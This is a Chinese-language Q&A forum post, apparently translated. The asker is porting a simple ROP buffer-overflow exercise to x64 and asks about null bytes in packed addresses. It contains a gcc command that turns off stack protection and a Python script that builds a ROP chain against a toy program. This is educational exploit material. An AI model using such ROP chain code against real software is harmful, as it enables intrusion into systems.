memory - ROP Exploit：地址包含空字节

问题描述

我目前正在尝试将这个简单的 ROP 攻击示例改编为 x64。相应地编译程序时：

gcc -O0 -g -static -fno-stack-protector -no-pie -o simple_rop64 ./simple_rop.c

并尝试调整函数的使用地址（使用 gdb）我有以下问题。例如，lazy() 函数的 x64 地址位于 0x401b9d，只有三个字节。因此， struct.pack 将添加一个空字节。

因此，python 解释器在执行此错误消息时会抛出错误：

python rop_exploit.py 
[...]
os.system("./simple_rop64 \"%s\"" % payload)
TypeError: system() argument 1 must be string without null bytes, not str

这个易受攻击的程序甚至可以使用这个函数地址（总是只有三个字节）吗？还是我必须以其他方式调整它？

谢谢你的帮助。

这里是我调整的python脚本

    #Find gadgets

#objdump -d simple_rop64 | grep --color -E -A2 "pop +%rbp"
#47c54a:    5d                      pop    %rbp
#47c54b:    c3                      retq 
pop_ret = 0x47c54a # start address of a pop,ret sequence

#objdump -d simple_rop32 | grep --color -A2 8049ca4
#8049ca4:   5f                      pop    %edi
#8049ca5:   5d                      pop    %ebp
#8049ca6:   c3                      ret 
pop_pop_ret = 0x8049ca4 # start address of a pop,pop,ret sequence

lazy = 0x401b9d # objdump -d | grep lazy
food = 0x401bb0 # objdump -d | grep food
feeling_sick = 0x401c0c # objdump -d | grep feeling_sick

#Buffer Overflow
#0x0000000000401d0d <+45>:  lea    -0x70(%rbp),%rax
payload = "A"*0x70
# Saved RBP register
payload += "BBBBBBBB"

#food(0xdeadbeef) gadget
payload += struct.pack("I", food)
payload += struct.pack("I", pop_ret)
payload += struct.pack("I", 0xdeadbeef)

#feeling_sick(0xd15ea5e, 0x0badf00d) gadget
payload += struct.pack("I", feeling_sick)
payload += struct.pack("I", pop_pop_ret)
payload += struct.pack("I", 0xd15ea5e)
payload += struct.pack("I", 0x0badf00d)

payload += struct.pack("I", lazy)

os.system("./simple_rop64 \"%s\"" % payload)

标签： memorybuffer-overflowexploit